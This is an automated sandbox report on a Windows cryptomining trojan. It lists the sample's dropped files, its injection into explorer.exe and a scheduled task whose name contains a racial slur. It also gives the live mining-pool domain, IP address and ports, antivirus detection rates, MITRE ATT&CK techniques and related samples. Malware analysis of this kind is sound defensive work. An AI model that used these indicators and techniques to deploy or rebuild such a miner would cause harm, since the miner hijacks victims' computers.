                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK matrix (the number in front of a technique is the count badge shown in the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 12 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 11 DLL Side-Loading | 511 Process Injection | 131 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 11 DLL Side-Loading | 511 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1394131 (graph image not available; node contents listed as text)
Sample: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Start date: 18/02/2024
Architecture: WINDOWS
Score: 100
Domains: monerooceans.stream, gulf.moneroocean.stream
Start-node signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Antivirus detection for dropped file; 11 other signatures
Processes started from the start node: m.exe; SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe; m.exe; 4 other processes
m.exe: dropped C:\Windows\Temp\wbiwcikhpmwr.tmp (PE32+) and C:\Program Files\Google\Libs\WR64.sys (PE32+); signatures: Suspicious powershell command line found; Found strings related to Crypto-Mining; Injects code into the Windows Explorer (explorer.exe); 4 other signatures; started explorer.exe and conhost.exe
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe: dropped C:\Program Files\MINA\m.exe (PE32+)
4 other processes: started conhost.exe (4 instances)
explorer.exe: connects to monerooceans.stream 44.196.193.227, ports 10128, 49712 (AMAZON-AESUS, United States); signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)
conhost.exe: Suspicious powershell command line found
monerooceans.stream (44.196.193.227): Detected Stratum mining protocol

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | 53% | ReversingLabs | Win64.Trojan.Whisperer |
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | 62% | Virustotal | | Browse
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | 100% | Avira | HEUR/AGEN.1329646 |
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Program Files\MINA\m.exe | 100% | Avira | HEUR/AGEN.1329646 |
C:\Windows\Temp\wbiwcikhpmwr.tmp | 100% | Joe Sandbox ML | |
C:\Program Files\MINA\m.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Google\Libs\WR64.sys | 5% | ReversingLabs | |
C:\Program Files\Google\Libs\WR64.sys | 1% | Virustotal | | Browse
C:\Program Files\MINA\m.exe | 53% | ReversingLabs | Win64.Trojan.Whisperer |
C:\Program Files\MINA\m.exe | 62% | Virustotal | | Browse
C:\Windows\Temp\wbiwcikhpmwr.tmp | 64% | ReversingLabs | Win64.PUA.DacicBitCoinMiner |
C:\Windows\Temp\wbiwcikhpmwr.tmp | 74% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
monerooceans.stream | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://xmrig.com/docs/algorithms | 0% | URL Reputation | safe |
http://www.microsoft.co | 0% | Avira URL Cloud | safe |
http://www.microsoft.co | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
monerooceans.stream | 44.196.193.227 | true | true | | unknown
gulf.moneroocean.stream | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000002.00000002.2081964848.000002AF357A3000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://xmrig.com/docs/algorithms | m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
44.196.193.227 | monerooceans.stream | United States | | 14618 | AMAZON-AESUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1394131
Start date and time: 2024-02-18 19:38:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Detection: MAL
Classification: mal100.evad.mine.winEXE@21/21@1/1
EGA Information:
• Successful, ratio: 20%
HCA Information: Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe, PID 5044 because it is empty
                                    • Execution Graph export aborted for target m.exe, PID 2724 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 1412 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 4296 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
19:38:55 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe modified
19:38:57 | API Interceptor | 77x Sleep call for process: powershell.exe modified
19:39:00 | Task Scheduler | Run new task: MINEINEYNIGGA path: C:\Program Files\MINA\m.exe
19:39:02 | API Interceptor | 2x Sleep call for process: m.exe modified
19:39:15 | API Interceptor | 1778708x Sleep call for process: conhost.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
44.196.193.227 | GoogleCrashHandler.exe | Get hash | malicious | Xmrig | Browse |
44.196.193.227 | yljlbesdmoas.exe | Get hash | malicious | Xmrig | Browse |
44.196.193.227 | BraveCrashHandler.exe | Get hash | malicious | Nanominer, Xmrig | Browse |
44.196.193.227 | GoogleCrashHandler.exe | Get hash | malicious | Xmrig | Browse |
44.196.193.227 | SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exe | Get hash | malicious | Xmrig | Browse |

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
monerooceans.stream | GoogleCrashHandler.exe | Get hash | malicious | Xmrig | Browse | 44.196.193.227
monerooceans.stream | yljlbesdmoas.exe | Get hash | malicious | Xmrig | Browse | 44.196.193.227
monerooceans.stream | GoogleCrashHandler.exe | Get hash | malicious | Xmrig | Browse | 44.196.193.227
monerooceans.stream | GoogleCrashHandler.exe | Get hash | malicious | Xmrig | Browse | 44.224.209.130
monerooceans.stream | vHAgn4Dx00.exe | Get hash | malicious | AveMaria, UACMe, Xmrig | Browse | 44.224.209.130
monerooceans.stream | vABMEuk0Ie.exe | Get hash | malicious | Xmrig | Browse | 44.196.193.227
monerooceans.stream | SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exe | Get hash | malicious | Xmrig | Browse | 44.196.193.227
monerooceans.stream | jJ4UO2hOfp.exe | Get hash | malicious | Xmrig | Browse | 44.224.209.130
monerooceans.stream | J2YYVJDL1f.exe | Get hash | malicious | Xmrig | Browse | 44.224.209.130
monerooceans.stream | Go4djq29iE.exe | Get hash | malicious | Xmrig | Browse | 44.224.209.130

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-AESUS | MTHJdsxrlR.elf | Get hash | malicious | Mirai | Browse | 44.205.36.178
AMAZON-AESUS | dq0s72MFq3.elf | Get hash | malicious | Mirai | Browse | 44.201.61.230
AMAZON-AESUS | WAFYMiJoIs.elf | Get hash | malicious | Mirai | Browse | 99.77.128.120
AMAZON-AESUS | uOwBMTUHGg.elf | Get hash | malicious | Mirai | Browse | 44.204.97.2
AMAZON-AESUS | CBo4R8XS5k.elf | Get hash | malicious | Mirai | Browse | 54.19.184.141
AMAZON-AESUS | 49nLHo99Hf.elf | Get hash | malicious | Mirai | Browse | 100.29.92.171
AMAZON-AESUS | L5dJXUt9Sz.elf | Get hash | malicious | Mirai | Browse | 54.8.18.195
AMAZON-AESUS | i6mpMiwNMm.elf | Get hash | malicious | Mirai | Browse | 54.14.53.253
AMAZON-AESUS | SecuriteInfo.com.Trojan.GenericKDZ.105649.13827.32664.exe | Get hash | malicious | Amadey, RisePro Stealer | Browse | 18.215.135.32
AMAZON-AESUS | SecuriteInfo.com.Trojan.GenericKDZ.105649.30549.11143.exe | Get hash | malicious | Amadey, RisePro Stealer | Browse | 34.195.9.80

No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files\Google\Libs\WR64.sys | HEzzgzqOfv.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | FV0mIIfKwQ.exe | Get hash | malicious | Amadey, RisePro Stealer, SmokeLoader, Stealc | Browse |
C:\Program Files\Google\Libs\WR64.sys | google-chrome-stable_x86_64-patch.v0.533.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | AffoeAIM.exe | Get hash | malicious | PureLog Stealer, Xmrig | Browse |
